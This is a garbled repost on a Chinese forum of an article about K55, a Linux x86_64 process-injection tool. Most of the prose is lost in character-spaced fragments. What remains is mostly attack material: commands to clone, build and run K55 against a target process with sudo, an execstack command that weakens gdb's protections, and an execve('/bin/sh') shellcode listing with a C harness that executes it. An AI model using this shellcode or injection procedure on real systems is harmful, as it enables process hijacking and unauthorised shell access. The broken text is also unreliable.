[16465] 2021-02-20_如何使用K55实现Linuxx86_64进程注入

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-02-20_如何使用K55实现Linuxx86_64进程注入 使 K 5 5 L i n u x   x 8 6 _ 6 4 A l p h a _ h 4 c k   F r e e B u f   2 0 2 1 - 0 2 - 2 0 K 5 5 K 5 5   P a y l o a d x 8 6 _ 6 4   s h e l l c o d e   P a y l o a d 使 C + + 1 1 C   L i n u x p t r a c e ( ) s h e l l c o d e 2 7 / b i n / s h B a s h   s h e l l s h e l l c o d e 广 使 K 5 5 使 使 p r o c e s s - n a m e r - x p e x e c s t a c k L i n u x 1   -   K 5 5 / 2   -   K 5 5 使 使 K 5 5 s h e l l c o d e r o o t k 5 5 _ t e s t _ p r o c e s s s h e l l P a y l o a d g i t   c l o n e   h t t p s : / / g i t h u b . c o m / j o s h 0 x A / K 5 5 . g i t c d   K 5 5 c h m o d   + x   b u i l d - i n s t a l l . s h . / b u i l d - i n s t a l l . s h U s a g e :   . / K 5 5   < p r o c e s s - n a m e > . / k 5 5 _ e x a m p l e _ p r o c e s s / k 5 5 _ t e s t _ p r o c e s s s u d o   . / K 5 5   k 5 5 _ t e s t _ p r o c e s s
S h e l l S h e l l p t r a c e K 5 5 e x e c s t a c k g d b s u d o   e x e c s t a c k   - s   / u s r / b i n / g d b
A r c h   L i n u x A U R e x e c s t a c k S h e l l   P a y l o a d P a y l o a d K 5 5 P a y l o a d P a y l o a d C m a i n :         x o r   e a x ,   e a x         m o v   r b x ,   0 x F F 9 7 8 C D 0 9 1 9 6 9 D D 1         n e g   r b x         p u s h   r b x         p u s h   r s p         p o p   r d i         c d q         p u s h   r d x         p u s h   r d i         p u s h   r s p         p o p   r s i         m o v   a l ,   0 x 3 b S y s c a l l # i n c l u d e   < s t d i o . h > # i n c l u d e   < s t r i n g . h > / /   S h e l l c o d e   b r e a k d o w n   o f   t h e   a s s e m b l y   c o d e . c h a r   c o d e [ ]   =   " x 3 1 x c 0 x 4 8 x b b x d 1 x 9 d x 9 6 x 9 1 x d 0 x 8 c x 9 7 x f f x 4 8 x f 7 x d b x 5 3 x 5 4 x 5 f x 9 9 x 5 2 x 5 7 x 5 4 x 5 e x b 0 x 3 b x 0 f x 0 5 " ; i n t   m a i n ( ) {         p r i n t f ( " l e n : % d   b y t e s n " ,   s t r l e n ( c o d e ) ) ;         ( * ( v o i d ( * ) ( ) )   c o d e ) ( ) ;         r e t u r n   0 ; }
M I T K 5 5

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则